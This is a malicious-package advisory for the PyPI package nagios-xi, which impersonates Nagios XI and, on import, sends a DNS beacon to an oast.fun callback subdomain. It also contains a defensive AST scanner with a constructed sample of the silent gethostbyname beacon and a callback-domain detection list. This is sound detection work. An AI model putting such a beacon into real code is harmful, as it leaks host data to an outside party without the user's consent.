MAL-2026-5698

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/nagios-xi/MAL-2026-5698.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5698
Published
2026-06-12T15:27:24Z
Modified
2026-06-12T20:02:00.831577719Z
Summary
Malicious code in nagios-xi (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (c11c80cc2d314460d61a649c84fd75881388470382be8183b77b362e562a5c7f)

On import nagios_xi, the package's __init__.py (lines 5-8) invokes socket.gethostbyname("atlass-check.autaeqjhfowvnnmkwhxjtq8x39d8nder1.oast.fun") inside a silent try/except. oast.fun is ProjectDiscovery's Interactsh out-of-band callback service; the DNS query itself is the exfiltration channel, confirming code execution on the installer's host and leaking the resolver IP to whoever controls the unique 32-character Interactsh subdomain. The package ships no actual functionality — it impersonates the Nagios XI commercial monitoring product (name nagios-xi, version 19.5.0 mimicking real Nagios XI versioning) while declaring an anonymous ProtonMail author (Coding Team <pocbug@protonmail.com>), a generic package utility description, and an empty README. The combination of brand impersonation, placeholder metadata, and an import-time OAST beacon as the package's sole behavior is reconnaissance for a supply-chain attack against developers searching for Nagios XI integrations.

Source: kam193 (d8b27c2588accf4f2966f4630a12f9bfdc4ba621403f14237160632447152f23)

Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.


Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

  • The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

  • The package overrides the install command in setup.py to execute malicious code during installation.
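
A static check for the import-time beacon described in the amazon-inspector entry above, as an added example that is not part of the advisory or of the package: it parses a module with Python's ast and reports resolver calls that run on import with a literal hostname under a callback suffix. The function name, the suffix list and the sample source are assumptions constructed for illustration.

```python
import ast

# Callback suffixes to flag; oast.fun is the one named in this advisory.
OAST_SUFFIXES = ("oast.fun",)
# Resolver calls that emit a DNS query when handed a hostname.
RESOLVER_CALLS = {"gethostbyname", "gethostbyname_ex", "getaddrinfo"}

def find_import_time_beacons(source, suffixes=OAST_SUFFIXES):
    """List resolver calls with a literal callback hostname that run on import."""
    findings = []

    def walk(node, silent):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            return  # function definitions are skipped: bodies run only when called
        if isinstance(node, ast.Try):
            # A body guarded by a pass-only handler fails without any trace.
            swallowed = silent or any(
                all(isinstance(s, ast.Pass) for s in h.body) for h in node.handlers)
            for child in node.body:
                walk(child, swallowed)
            for child in node.handlers + node.orelse + node.finalbody:
                walk(child, silent)
            return
        if isinstance(node, ast.Call):
            name = getattr(node.func, "attr", None) or getattr(node.func, "id", None)
            args = node.args if name in RESOLVER_CALLS else []
            for arg in args:
                if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                    host = arg.value.lower().rstrip(".")
                    if any(host == s or host.endswith("." + s) for s in suffixes):
                        findings.append(
                            {"line": node.lineno, "host": host, "silent": silent})
        for child in ast.iter_child_nodes(node):
            walk(child, silent)
    walk(ast.parse(source), False)
    return findings

# Constructed sample with the shape the advisory describes (hostname is made up).
SAMPLE_INIT = '''\
import socket

try:
    socket.gethostbyname("token-constructed.oast.fun")
except Exception:
    pass
'''

if __name__ == "__main__":
    print(find_import_time_beacons(SAMPLE_INIT))
```

Run it over each `__init__.py` of an unpacked sdist or wheel before installation; a hit with `silent` set to true matches the swallowed-exception pattern reported for this package.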

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "pypi/GENERIC-standard-pypi-install-pentest/nagios-xi",
            "versions": [
                "19.4.0",
                "19.5.0"
            ],
            "sha256": "d8b27c2588accf4f2966f4630a12f9bfdc4ba621403f14237160632447152f23",
            "source": "kam193",
            "modified_time": "2026-06-12T15:27:24.46448Z",
            "import_time": "2026-06-12T16:32:19.011939508Z"
        },
        {
            "id": "IN-MAL-2026-006196",
            "import_time": "2026-06-12T19:44:18.873734183Z",
            "sha256": "bf230c0a9f6b4215c87f567dc3b40574dc7e8581debf2cf518621e9491241886",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:11:02Z",
            "versions": [
                "19.5.0"
            ]
        },
        {
            "id": "IN-MAL-2026-006195",
            "import_time": "2026-06-12T19:44:18.777294268Z",
            "sha256": "c11c80cc2d314460d61a649c84fd75881388470382be8183b77b362e562a5c7f",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:11:01Z",
            "versions": [
                "19.5.0"
            ]
        }
    ]
}

Affected packages

PyPI / nagios-xi

Package

Affected ranges

Affected versions

19.*
19.4.0
19.5.0

Database specific

indicators
{
    "evidence_files": [
        {
            "path": "nagios_xi/__init__.py",
            "sha256": "36dea5501185191fc23e357d31dcf965b05e6573667a2f069bc599583a25ce9d",
            "tlsh": "3fd012568d9595512376931d001a4598e19952034a121e3735fddb805f7617108b3399"
        },
        {
            "path": "pyproject.toml",
            "sha256": "05321a5ace4b9b52ae3635fec8c626890e2c0aefd9c6f93c27fcab947f88e1e0",
            "tlsh": "b8f0dc3389c3eea96792419030158120da71916e2b84c4ea76fec18d6babd40c7fcc34"
        }
    ],
    "package_integrity": [
        {
            "filename": "nagios_xi-19.5.0-py3-none-any.whl",
            "hashes": {
                "md5": "cccc2a73e13244868b175ca85f33cf28",
                "blake2b_256": "0414f620b2350dc87b6128e791674b646188f892e4bc8f96b7ec3c22bd7969b7",
                "sha256": "0c13fa1337c4fcfbed11201d528adcadfe6e02b86387fa2e029966b0e3f08c38"
            }
        },
        {
            "filename": "nagios_xi-19.5.0.tar.gz",
            "hashes": {
                "md5": "47adb051c92db6a22b350bf9d858af3e",
                "blake2b_256": "f4d535cec652948dada4a2f987250ae1f3e706a1bcf69790209a34685289a7cb",
                "sha256": "73668f0ab1312b81e895747d19bc12a04a152d837dc864bca6eae76fcb30841f"
            }
        }
    ],
    "domains": [
        "atlass-check.autaeqjhfowvnnmkwhxjtq8x39d8nder1.oast.fun"
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/nagios-xi/MAL-2026-5698.json"